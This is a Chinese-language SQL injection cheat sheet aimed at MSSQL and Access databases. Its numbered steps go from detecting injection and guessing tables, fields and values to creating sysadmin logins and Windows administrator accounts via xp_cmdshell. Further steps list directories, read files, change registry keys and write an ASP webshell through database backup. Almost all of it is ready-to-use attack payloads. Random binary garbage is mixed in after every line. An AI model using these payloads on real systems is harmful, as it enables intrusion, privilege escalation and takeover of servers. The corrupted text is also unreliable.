1.判断是否有注入;and 1=1 ;and 1=2 oW3{&vf�z�
2.初步判断是否是mssql ;and user>0 \:n�tqj&A|
XmN��3[j��
3.注入参数是字符'and [查询条件] and ''=' �J/��Ki]T9
6-�C9[[�g<
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 0]3%BgZ(a8
Hp;Dp�!PLa
5.判断数据库系统 JK���0L&t<
{#�YGor�|�
;and (select count(*) from sysobjects)>0 mssql $>zLa_�cn|
�=B�O} �hk
;and (select count(*) from msysobjects)>0 access p|Vo�IQ�Y
DPR�=X��ls
aW�$(�lf2;
/�pzE�L���
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �Gr6XqO�_�
b4��8�9s�a
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �~�3�� 4Ly
]5�b%�r;_�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 %IG�cn�48J
l�gp-�/O"T
9.(1)猜字段的ascii值(access) ZVu&q{s��,
.nX+�!EXeS
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 * �Zb-��YA
[|<�2B��QX
(2)猜字段的ascii值(mssql) RGy�4p)z*+
%�Z?2��.)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 zM?JLNs]<{
V�h1{8'G�Q
10.测试权限结构(mssql) `�iuo([E d
�}I_/>58��
`��Z�L��~k
;\yY�*���
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- >
E�;�`;b
�Wi�]Mp7b
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �R:���HF~}
��c�d�,)GF
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- H/m -$;cF3
�CbTYt�6DC
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �bf�]W_I]B
�$r}�)j�~c
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �;Kq�H]h)�
�bm9@�A]yP
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 9q��xB/5d_
w�]Z*"B�&h
;and 1=(select IS_MEMBER('db_owner'));-- jeM� %�XI�
n�|5+H�E4@
4�r5trq�uC
d7�Ln��a^�
11.添加mssql和系统的帐户 �O}\$E�{-�
n]G!@��-z
;exec master.dbo.sp_addlogin username;-- =w='qj��h�
;exec master.dbo.sp_password null,username,password;-- �L��/,#:�J
bp �Q/#\Z�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- V~p�/���P�
|��~��vo��
;exec master.dbo.xp_cmdshell 'net user username password 1?��s��]nU
:X��7"f��X
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- D�>�wq4��u
kx=.K'd5�H
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Cw��"Y=�`�
xu[6h?u(h8
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �8�/c�D7O
�Y(QLlJ*)/
�NU>={�9�!
u'}Sa�X]0
12.(1)遍历目录 �_� S%3?Q�
`?�)ivy>\:
;create table dirs(paths varchar(100), id int) m�":lK�XpQ
�Zhb�)��n�
;insert dirs exec master.dbo.xp_dirtree 'c:\' F8�{"Rk�}�
��pj�?wQ�'
;and (select top 1 paths from dirs)>0 z^s/7�Va�[
J
�W�aI[n}
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 1j7^2Y|UT`
7��u/_�3x1
�}& �;49�k
��(izGF;N+
(2)遍历目录 8,�I�il�:w
z�/�zUb``�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- r}ZL{u�WMW
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �2�t��'��^
�&wc%��mQV
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ;`�<uo�$R
i��r^%9amh
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Dj!�v��+<b
CjRI!}S��
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 =@w,D.5h�
Cz@[l=-T�7
h"�>L>*Wfx
h�kOhY3�K5
13.mssql中的存储过程 0c*y~hU�VZ
R�zG�7Xr=t
xp_regenumvalues 注册表根键, 子键 X1�Vx�6�+[
D90m.�.\w
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 [_�W�#�8{
7!.#:+rg5#
xp_regread 根键,子键,键值名 �QR4!r@*=
Ll�i�O�hr4
;exec xp_regread D�=*�3Xd��
/~`4a����
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 }T([gc7��~
Fljqh8c��5
xp_regwrite 根键,子键, 值名, 值类型, 值 m]t�`;l�r<
�P~Ss\�PT�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �I75>$"$<
�H�rb67a%b
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 [K_v,m]
��
�uA#�uq^3�
xp_regdeletevalue 根键,子键,值名 :ryyo���$
�V'�[Lqe,y
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ]z5`!�e)�L
L�o"w,p`n@
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �AWkXW�l}�
�d�N�'2;X
U/2]ACGCN^
�*f�s'%"w-
14.mssql的backup创建webshell ]:�Y@��p�Z
(.6~t<�DRv
use model Z!\xVCG�"q
8��}9��B*m
create table cmd(str image); &�f�H;A X.
;��2lKo�="
insert into cmd(str) values (''); 'F3cv�pc�`
��m��I5BJ�
backup database model to disk='c:\l.asp'; QU0F��eGtz
�]�&l.-0jt
[,;h1m ~iX
�fB�.xj�p?
15.mssql内置函数 ~zdHJ�8tYp
R�w8l�"��`
;and (select @@version)>0 获得Windows的版本号 9='a9\((mH
a:$h�K%^
\
;and user_name()='dbo' 判断当前系统的连接用户是不是sa x�4@v$phyH
d1M�Y>��zq
;and (select user_name())>0 爆当前系统的连接用户 �Z/�#l~.o[
VRr_s:�CWK
;and (select db_name())>0 得到当前连接的数据库 $#|iKi<Y@j
��R�+}�x�#
tu.Tvtudzj
p���'#
(^�
16.简洁的webshell RY8Ot2�DWi
46U?aHKW@|
use model "M���e)�'�
CUz1�q*�):
create table cmd(str image); �Snm
m�(.
$"V�gN�ynq
insert into cmd(str) values (''); O3H~�|R+^
*d�B^B��5�
backup database model to disk='g:\wwwtest\l.asp';
